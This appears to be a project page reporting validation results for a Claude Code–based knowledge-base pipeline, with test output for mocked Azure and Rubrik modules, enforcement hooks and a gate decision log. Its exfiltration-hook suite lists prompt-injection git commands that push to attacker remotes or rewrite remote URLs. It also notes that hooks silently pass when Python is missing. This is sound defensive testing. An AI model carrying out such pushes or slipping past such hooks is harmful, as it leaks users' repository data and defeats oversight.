KB Validation

The Numbers, With Receipts

Every number on this page comes from a test run or a log file. The test commands are shown verbatim. The gate decision log is public. Nothing here is an estimate.

All tests run 2026-04-05 · Python 3.14.3 · Node.js v24.14.1 · AIOS-v2-personal-KBcore

256 Assertions passing

source: npm test → 5 modules, 0 failures

22/22 Pre-flight checks

source: python3 .claude/check-hooks.py

16/16 Hook test cases

source: python3 scripts/test-exfiltration-hook.py

94% Gate admission rate

source: captures/librarian-decisions.jsonl — 74 of 79

Test Suite 1 of 3

Module Assertion Tests

Five independent Node.js test files, one per module. Each validates the standard output shape defined in aios/doctrine/output-format.md. Run with npm test from repo root.

$ npm test

> aios-v2-personal@1.0.0 test
> cd aios && npm test

=== azure-auth test suite ===
  PASS  output has all required fields (block, status, inputs, result, verified_against, duration_ms, gotchas, next_blocks)
  PASS  status is SUCCESS on valid mock token response
  PASS  credential values are redacted in output
  PASS  duration_ms is a positive number
  ... 30 more assertions ...
=== Results: 34 passed, 0 failed ===

=== rubrik-auth test suite ===
  PASS  output shape conforms to doctrine output-format.md
  PASS  status is SUCCESS on valid RSC token
  PASS  credential fields are redacted before output
  ... 33 more assertions ...
=== Results: 36 passed, 0 failed ===

=== vm-list test suite ===
  PASS  returns array of VM objects with required fields
  PASS  handles empty subscription gracefully (status WARN, not FAIL)
  PASS  filters by resource group when provided
  ... 35 more assertions ...
=== Results: 38 passed, 0 failed ===

=== snapshot-status test suite ===
  PASS  returns standard block shape with snapshots array
  PASS  status is FAIL when RSC returns error, not exception
  PASS  missed_sla flag set correctly on partial coverage
  ... 62 more assertions ...
=== Results: 65 passed, 0 failed ===

=== backup-health stack test suite ===
  PASS  stack output wraps module results into unified shape
  PASS  status is WARN when any module returns WARN
  PASS  status is FAIL when VM not found — root cause propagated
  PASS  status is FAIL when no VM name provided — root cause explains missing input
  ... 79 more assertions ...
=== Results: 83 passed, 0 failed ===

Total: 256 passed, 0 failed

Note: All tests run against mock data. Live Azure AD and Rubrik RSC APIs not
called. Modules have not been validated against live endpoints.

Limitation explicitly noted: These tests validate JSON shape conformance and logic correctness against mocks. They do not prove that the modules work against live Azure or Rubrik APIs. That validation requires live credentials and is documented as a known gap in STATUS.md.

Test Suite 2 of 3

Security Hook — Exfiltration Detection

block-git-exfiltration.py is a PreToolUse hook that detects prompt-injection attacks attempting to push repo history to attacker-controlled remotes. The test suite runs the hook's check_bash_command() function directly — no Claude Code session required.

MUST PASS (exit 0) — 9 cases

$ python3 scripts/test-exfiltration-hook.py

=== MUST PASS (exit 0) ===
  PASS  [basic push to origin]
  PASS  [push with -u flag]
  PASS  [push with --force flag]
  PASS  [bare push (no args)]
  PASS  [push with shell redirect (was bug)]
  PASS  [push with && chaining]
  PASS  [push origin with trailing redirect]
  PASS  [commit msg with git push text]
  PASS  [commit msg mention + real push to origin]

MUST BLOCK (exit 2) — 7 cases

=== MUST BLOCK (exit 2) ===
  PASS  [hostname remote]
         → git push to non-origin remote 'attacker.com'
  PASS  [short non-origin remote name]
         → git push to non-origin remote 'evil-server'
  PASS  [URL remote]
         → git push to non-origin remote 'https://evil.com/repo'
  PASS  [non-origin named remote]
         → git push to non-origin remote 'upstream'
  PASS  [git remote add]
         → git remote add — exfiltration vector
  PASS  [git remote set-url]
         → git remote set-url — exfiltration vector
  PASS  [git config remote url]
         → git config remote.*.url — exfiltration vector

Results: 16 passed, 0 failed

Why the "shell redirect was bug" case matters: Earlier versions of this hook matched 2>&1 as a remote name, blocking legitimate commands like git push 2>&1; echo done. The current implementation splits on shell separators and strips metacharacters before checking the remote token. That specific regression is now a named test case.

Test Suite 3 of 3

Pipeline Pre-Flight — 22 Checks

check-hooks.py must be run before any KB pipeline session. It validates Python availability, hook file integrity, enforcement behavior, and pipeline directory existence. Exit 127 detection is included — this is the failure mode where Python is not found and all hooks silently pass, bypassing all enforcement.

$ python3 .claude/check-hooks.py

────────────────────────────────────────────────────────────
  1. Python Runtime
────────────────────────────────────────────────────────────
  PASS  Python 3.14.3 — meets minimum (3.8+)
  PASS  'python3' command resolves: Python 3.14.3

────────────────────────────────────────────────────────────
  2. Hook Files
────────────────────────────────────────────────────────────
  PASS  check-class-a-gate.py — exists, syntax OK
  PASS  check-readme-before-code.py — exists, syntax OK
  PASS  check-test-before-next.py — exists, syntax OK
  PASS  check-test-before-stack.py — exists, syntax OK
  PASS  hook_logger.py — exists, syntax OK
  PASS  log-class-a-admission.py — exists, syntax OK
  PASS  log-gate-decision.py — exists, syntax OK
  PASS  remind-capture.py — exists, syntax OK
  PASS  session-checkpoint-reminder.py — exists, syntax OK
  PASS  post-compact-reorient.py — exists, syntax OK

────────────────────────────────────────────────────────────
  3. Pipeline Directories
────────────────────────────────────────────────────────────
  PASS  captures/ exists
  PASS  captures/candidates/ exists
  PASS  knowledge-base/class-a/ exists

────────────────────────────────────────────────────────────
  4. Logging
────────────────────────────────────────────────────────────
  PASS  hook-fires.log writable at aios/captures/

────────────────────────────────────────────────────────────
  5. Enforcement Hooks — Behavioral Tests
────────────────────────────────────────────────────────────
  PASS  check-class-a-gate: BLOCKS unauthorized class-a write (exit 2 with stderr message)
  PASS  check-class-a-gate: ALLOWS non-class-a writes (exit 0)
  PASS  check-readme-before-code: BLOCKS index.js without README.md (exit 2 with message)
  PASS  check-readme-before-code: ALLOWS unrelated paths (exit 0)
  PASS  check-class-a-gate: handles empty stdin gracefully (exit 0)

────────────────────────────────────────────────────────────
  6. Working Directory Sanity
────────────────────────────────────────────────────────────
  PASS  CWD is repo root: C:\Users\Dustin\Documents\AIOS-v2-Personal
  WARN  Cycle checkpoint is stale: cycle-checkpoint-2026-04-03-round13.md (55.1h ago)

════════════════════════════════════════════════════════════
  PRE-FLIGHT RESULT
════════════════════════════════════════════════════════════
  Passed: 22   Failed: 0

  All checks passed. KB pipeline enforcement is active.

The WARN on "stale checkpoint" is expected — it fires when the hourly sweep hasn't run recently. It's a non-blocking warning (exit 0), not a failure. The hourly remote trigger is separate from this pre-flight check.

Gate Decision Log

79 Decisions. Every One Logged.

The Librarian runs five yes/no questions on every candidate before it can enter Class A. All decisions are appended to captures/librarian-decisions.jsonl. The 2 rejections below show exactly why — Q1 failed, meaning the command was never executed in this environment.

Class A entries by domain (43 total)

anthropic-claude

tooling

github-patterns

azure-general

atlassian

azure

rubrik

Decision breakdown (79 decisions)

ADMIT

74 (94%)

REJECT

2 (3%)

DEFER

3 (4%)

A 94% admission rate sounds high. It reflects that candidates are pre-screened before reaching the gate — speculative or unverified content is parked in the candidate queue without being submitted. The 2 rejections show the gate working as designed: high-value content that failed Q1 (not executed in this environment) was routed to Class C, not promoted to Class A.

Entry ID	Decision	Q1 Executed?	Q2 Deterministic?	Q3 General?	Q4 Additive?	Q5 No duplicate?	Reason (excerpt)
cmd-20260329-1530-004	admit	✓	✓	✓	✓	✓	Hook integrity 3-way cross-reference: disk files vs settings.json vs HOOK-MANIFEST.md. Validates all three are in sync.
cmd-20260329-1715-014	admit	✓	✓	✓	✓	✓	Official Claude Code skills spec — 15+ capabilities absent from our implementation. 250-char description cap alone affects all 8 of our skills.
cmd-20260329-1730-015	admit	✓	✓	✓	✓	✓	CLAUDE.md delivered as user message, not system prompt — no guarantee of strict compliance. HARD RULES are behavioral guidance only. PreToolUse hooks are the real enforcement layer.
cmd-20260330-0906-073	reject	✗	✓	✓	✓	✓	Q1 FAILED — not executed in our environment. Competitive analysis via web research. High-value content, but Class A rules require execution. Routed to Class C competitive-intelligence instead.
cmd-20260330-0907-074	reject	✗	✓	✓	✓	✓	Q1 FAILED — not executed in our environment. AI-assisted infra training market gap survey. Market survey, no commands. Routed to Class C. Not promoted despite high value.

Full log: captures/librarian-decisions.jsonl — 79 entries in chronological append order, each entry is machine-readable JSON.

What Class A Looks Like

A Real Entry — Unedited

This is entry cmd-20260329-1530-004 from the anthropic-claude/hooks subdomain. Showing the actual fields — not a diagram of fields, the actual content from the file.

id: cmd-20260329-1530-004 · domain: anthropic-claude/hooks · validated: 2026-03-29 · validator: sonnet

class-a-provisional

Intent

Verify that every hook script on disk has a corresponding entry in settings.json, and that HOOK-MANIFEST.md exists as documentation. This three-way cross-reference (disk, config, docs) validates hook integrity.

Command

hooks-integrity-check

# Step 1: List hook files on disk
ls .claude/hooks/*.py

# Step 2: Verify manifest exists
ls .claude/hooks/HOOK-MANIFEST.md

# Step 3: Parse settings.json for referenced hooks
python3 -c "
import json
with open('.claude/settings.json') as f:
    s = json.load(f)
for event, matchers in s.get('hooks', {}).items():
    for matcher in matchers:
        for h in matcher.get('hooks', []):
            print(event, h.get('command',''))
"

What This Page Does and Does Not Show

What is proven by tests on this page

✓ 256 module assertions pass against documented output shape (npm test, run 2026-04-05)
✓ 16 exfiltration hook test cases pass — correct allow/block behavior verified (python3 test, 2026-04-05)
✓ 22 pre-flight checks pass — hooks present, syntax valid, behavioral enforcement confirmed (2026-04-05)
✓ 79 gate decisions recorded in JSONL — 74 admits, 2 rejects (Q1 failure), 3 deferred. All decisions auditable.
✓ 43 Class A entries exist on disk across 9 domains — countable, readable, not estimates.

What this page does not show

✗ Time-to-resolution comparisons — no baseline was measured before the KB existed. Any "X minutes faster" claim would be an estimate.
✗ Live API validation — all module tests run against mocks. Azure AD and Rubrik RSC endpoints have not been called in automated tests.
✗ Token or cost reduction numbers — these are observable in Claude.ai usage logs but have not been systematically measured.
✗ Second-session vs first-session comparisons — would require controlled re-runs of the same query with and without KB entries present.

Run It Yourself

The repo is AIOS-v2-personal-KBcore. Every test on this page runs with npm test, python3 .claude/check-hooks.py, and python3 scripts/test-exfiltration-hook.py.

Talk Through the Architecture